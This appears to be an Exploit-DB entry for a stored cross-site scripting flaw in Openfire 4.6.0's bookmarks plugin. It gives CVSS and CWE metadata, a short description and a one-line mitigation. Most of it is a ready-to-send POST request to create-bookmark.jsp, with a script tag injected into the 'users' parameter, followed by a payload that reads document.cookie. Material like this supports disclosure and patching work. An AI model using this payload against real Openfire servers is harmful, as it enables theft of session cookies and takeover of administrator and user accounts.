header-logo
Suggest Exploit
vendor:
Openfire
by:
j5s
8.8
CVSS
HIGH
Stored XSS
79
CWE
Product Name: Openfire
Affected Version From: 4.6.0
Affected Version To: 4.6.0
Patch Exists: NO
Related CWE: N/A
CPE: a:igniterealtime:openfire:4.6.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: N/A
2020

Openfire 4.6.0 – ‘users’ Stored XSS

Openfire 4.6.0 is vulnerable to Stored XSS in the 'users' parameter. An attacker can inject malicious JavaScript code into the 'users' parameter of the create-bookmark.jsp page. When a user visits the page, the malicious code will be executed in the user's browser.

Mitigation:

Input validation should be used to prevent malicious code from being injected into the 'users' parameter.
Source

Exploit-DB raw data:

# Exploit Title: Openfire 4.6.0 - 'users' Stored XSS
# Date: 2020/12/11
# Exploit Author: j5s
# Vendor Homepage: https://github.com/igniterealtime/Openfire
# Software Link: https://www.igniterealtime.org/downloads/
# Version: 4.6.0

POST /plugins/bookmarks/create-bookmark.jsp HTTP/1.1
Host: 192.168.137.137:9090
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Content-Length: 144
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=node087pcmtxo1yry1fzb5tlt5bz4c19.node0;
csrf=j0MLh55rjr1bMx0; DWRSESSIONID=oWZp3ax5c9EpPgMNZv4T4BASYrwhhv3K8pn
Origin: http://192.168.137.137:9090
Referer: http://192.168.137.137:9090/plugins/bookmarks/create-bookmark.jsp?type=group_chat
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip

createGroupchatBookmark=%E5%BB%BA%E7%AB%8B&groupchatJID=&groupchatName=&groups=&type=groupchat&users=%22%3E%3CScRiPt%3Ekcxbfhabog%3C%2FsCrIpT%3E



Vulnerable parameters:users

payload:"><ScRiPt>alert(document.cookie)</ScRiPt>